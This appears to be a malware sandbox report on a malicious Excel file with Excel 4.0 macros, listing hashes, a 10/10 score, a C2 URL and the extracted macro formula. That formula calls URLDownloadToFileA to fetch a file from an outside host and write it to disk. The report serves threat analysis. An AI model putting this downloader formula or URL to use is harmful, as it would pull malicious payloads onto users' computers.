Overview

overview

10

Static

static

10

db51470283...c3.xls

windows7_x64

10

db51470283...c3.xls

windows10_x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    5527146056155136.zip

  • Size

    11KB

  • MD5

    bda336dfdf5f1db4824bbe1650f7b7cc

  • SHA1

    6767e6b4ea3f2df27fa645af10424e86b8ab4041

  • SHA256

    bb855c66321ea9de7518e375451bb97aaf2e48277dc96384ef8f1ab34c61e1b0

  • SHA512

    e6b0913c54bf530bb6e6b16c7e2e0745e189083863304101b39abce7d64a166b5b4d121144e344a2289808905b5134b1c8e844cd7fe288e51120940c4a8bc06a

Score
10/10
macroxlm

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://xjw10whta03ytgdi.com/inda.xls

Attributes
  • formulas

    =CALL("URLMon","URLDownloadToFileA","JJCCBB",0,"http://xjw10whta03ytgdi.com/inda.xls","..\fkruf.djr",0)

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

    macroxlm

Files

  • 5527146056155136.zip
    .zip

    Password: infected

  • db51470283d68b4eb4bcaa7ec2479a06d41503cd5862214f97e4f394748b36c3
    .xls windows office2003